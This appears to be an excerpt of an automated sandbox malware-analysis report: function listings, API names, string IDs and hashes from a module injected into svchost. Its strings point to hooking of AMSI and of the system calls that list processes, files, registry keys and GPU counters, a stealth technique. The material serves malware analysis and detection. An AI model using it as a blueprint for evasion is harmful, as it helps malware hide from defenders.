                                                          • Part of subcall function 00000179537A20C0: GetModuleHandleA.KERNEL32(?,?,?,00000179537A1D79), ref: 00000179537A20D8
                                                          • Part of subcall function 00000179537A20C0: GetProcAddress.KERNEL32(?,?,?,00000179537A1D79), ref: 00000179537A20E9
                                                          • Part of subcall function 00000179537A5F50: GetCurrentThreadId.KERNEL32 ref: 00000179537A5F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: 144786ca67ee834590dcdd2ce572057f11d56842eb5103a61e565e1afeddc219
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: 724164B0E29A6AE0FA47EF64E8A17D42375A70634CF845423D40D17B75AE38C68ED360
                                                        Function 0000017953776D30 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 117a70c9fd4a5af8f6538bebe1d0b72fa41e995df5b9e41a9d619c1a81635272
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 5581E631F1C2A186FB53AB2594413E967F1BB4778CF44456BEA0C937AADB78C84E8710
                                                        Function 00000179537A2FA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: 2895b2554e113aa91f9c480ce72561ef6d74b28a13f9fa80c9b3b14ce7caa0f1
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 0831DC31E18A6496F712CF92A4043DAB3B1F789BC9F444117EE8D43B24EF38C4598740
                                                        Function 00000179537A30B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: ad2a23686253c9dae7c2068e57bb35f726f592bedf0220ca7a2f324de2bfa574
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: 61318131A28F6186F752DFA6E85479A63B1F785F89F044127DE4E43B24EF38C4498600
                                                        Function 00000179537A7930 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 314 179537a7930-179537a7936 315 179537a7971-179537a797b 314->315 316 179537a7938-179537a793b 314->316 317 179537a7a98-179537a7aad 315->317 318 179537a7965-179537a79a4 call 179537a7fe0 316->318 319 179537a793d-179537a7940 316->319 323 179537a7abc-179537a7ad6 call 179537a7e74 317->323 324 179537a7aaf 317->324 337 179537a7a72 318->337 338 179537a79aa-179537a79bf call 179537a7e74 318->338 321 179537a7942-179537a7945 319->321 322 179537a7958 __scrt_dllmain_crt_thread_attach 319->322 329 179537a7951-179537a7956 call 179537a7f24 321->329 330 179537a7947-179537a7950 321->330 327 179537a795d-179537a7964 322->327 335 179537a7ad8-179537a7b0d call 179537a7f9c call 179537a7e3c call 179537a8338 call 179537a8150 call 179537a8174 call 179537a7fcc 323->335 336 179537a7b0f-179537a7b40 call 179537a81b0 323->336 325 179537a7ab1-179537a7abb 324->325 329->327 335->325 346 179537a7b51-179537a7b57 336->346 347 179537a7b42-179537a7b48 336->347 341 179537a7a74-179537a7a89 337->341 349 179537a79c5-179537a79d6 call 179537a7ee4 338->349 350 179537a7a8a-179537a7a97 call 179537a81b0 338->350 352 179537a7b59-179537a7b63 346->352 353 179537a7b9e-179537a7bb4 call 179537a3618 346->353 347->346 351 179537a7b4a-179537a7b4c 347->351 364 179537a7a27-179537a7a31 call 179537a8150 349->364 365 179537a79d8-179537a79fc call 179537a82fc call 179537a7e2c call 179537a7e58 call 179537a9dfc 349->365 350->317 358 179537a7c3f-179537a7c4c 351->358 359 179537a7b65-179537a7b6d 352->359 360 179537a7b6f-179537a7b7d 352->360 370 179537a7bb6-179537a7bb8 353->370 371 179537a7bec-179537a7bee 353->371 367 179537a7b83-179537a7b98 call 179537a7930 359->367 360->367 380 179537a7c35-179537a7c3d 360->380 364->337 384 179537a7a33-179537a7a3f call 179537a81a0 364->384 365->364 414 179537a79fe-179537a7a05 __scrt_dllmain_after_initialize_c 365->414 367->353 367->380 370->371 377 179537a7bba-179537a7bdc call 179537a3618 call 179537a7a98 370->377 378 179537a7bf5-179537a7c0a call 179537a7930 371->378 379 179537a7bf0-179537a7bf3 371->379 377->371 409 179537a7bde-179537a7be3 377->409 378->380 398 179537a7c0c-179537a7c16 378->398 379->378 379->380 380->358 403 179537a7a41-179537a7a4b call 179537a80b8 384->403 404 179537a7a65-179537a7a70 384->404 400 179537a7c21-179537a7c31 398->400 401 179537a7c18-179537a7c1f 398->401 400->380 401->380 403->404 413 179537a7a4d-179537a7a5b 403->413 404->341 409->371 413->404 414->364 415 179537a7a07-179537a7a24 call 179537a9d98 414->415 415->364
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: f6d283d8385ea9a87ab5327fad51ca6933fedb54720d286f476f041588e6e2ca
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 6E810631E2C2B196F6579BA998813D963F2A74778CF444067D90DC7796EF38C94E8700
                                                        Function 00000179537A9930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000179537A9AEF,?,?,?,00000179537A98B4,?,?,?,?,00000179537A94A5), ref: 00000179537A99B5
                                                        • GetLastError.KERNEL32(?,?,?,00000179537A9AEF,?,?,?,00000179537A98B4,?,?,?,?,00000179537A94A5), ref: 00000179537A99C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000179537A9AEF,?,?,?,00000179537A98B4,?,?,?,?,00000179537A94A5), ref: 00000179537A99ED
                                                        • FreeLibrary.KERNEL32(?,?,?,00000179537A9AEF,?,?,?,00000179537A98B4,?,?,?,?,00000179537A94A5), ref: 00000179537A9A33
                                                        • GetProcAddress.KERNEL32(?,?,?,00000179537A9AEF,?,?,?,00000179537A98B4,?,?,?,?,00000179537A94A5), ref: 00000179537A9A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: 0f0b4730a1ba7bfcf0baa74fe338853f95d8d3eba7f9443d2628ab5ec01facb2
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: DA31A531B2AA64A1FE179B42A8507DD63B8FB47B68F594527DD2D07390EF38C459C300
                                                        Function 00000179537B1CBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 2437a8b51684a13ae34f0f7689f0f0060c2104b9327bea4e9ef54d5ec47a7f7e
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 4111B231B18B6486F7518B52E86835973B0F78AFE8F000226EA5D87794EF3CC948C740
                                                        Function 00000179537A31C0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: fb8b43cd758de4931f8e82002fbe7b8cfd4fb9c6bffa49b051a15534a120ed0b
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: B731B332F19B6182FB56DFD6A4443A963B0FB56B88F0440229F4C07B94EF38D4A98700
                                                        Function 00000179537A1934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: f80ac3cf0bbbfd5f16a2fdc16c31ab354769bbfe1f0ce3f257f61dd22aa88529
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: 8F016D31B0CA9482FB15DB52A86839963B1FB89BC8F884136DE8E43754EF3CC589C740
                                                        Function 00000179537A19D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: 13d5538f2ae6fa1a42b57c4935466a6d4d2f3ef02a1b7b3d65ff422c2a4f55fa
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: 2CF0443275869592F7219B55F4E43D96371F74578CF848022DA4D46654EF7CC68DC700
                                                        Function 00000179537AA258 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: de6d3a793f8961d7db89080c54d518dc201812c7f05fee8bdb25630fb0bc1cb0
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: 67F08271B29A1081FF464FA0E8A47E52770EF8AB48F48141BA44F463A0EF38C4ECC310
                                                        Function 00000179537A54F0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction ID: df54e37cd1bacfb0d1eaac2903c943d60593f9e8d287c52316c6a2aa98a45e07
                                                        • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction Fuzzy Hash: 9C02B83662DB9486E761CB59E49039AB7B1F3C5794F104116EACE87BA8DF7CC458CB00
                                                        Function 00000179537B0980 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00000179537B09C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000179537B093F,?,?,?,00000179537AE263), ref: 00000179537B0A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000179537B093F,?,?,?,00000179537AE263), ref: 00000179537B0B0A
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: 55b7a1aa93c86277cdfc95052223a7cc852c0b41211f4772ea7fec6daadce431
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: 7E81D032E18A7489FB629F6498A07EE2BB1F746B9CF444117DE0E53B91FB348449C710
                                                        Function 00000179537813D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: dd4ff6265f6b4cd38b2e7c3e24edd108bbaa736065270b1acd5fa8270f663acf
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 4611C272E5CA3001F7661268E4623E997707B9777CF180727EA7F473D69A18894DC200
                                                        Function 00000179537B1FD8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 0952cd0018406b670d3bd6cc0bca658b50102c8ef326c43d102b2efb4b1de044
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: F3118A32E5DA2901F75B1524D4773E55370AB5737CF144627EF7E4A3E6AA18488DC304
                                                        Function 00000179537A3BB8 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: 8ea45ca38991729d93b33ef2d54d166a038282f39921ddbbf8f073f231299308
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: 84117036B1C76492FB169F65E4142A9A3B1FB4AB88F040026DE8D07B94EF3DC548C700
                                                        Function 00000179537A3558 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
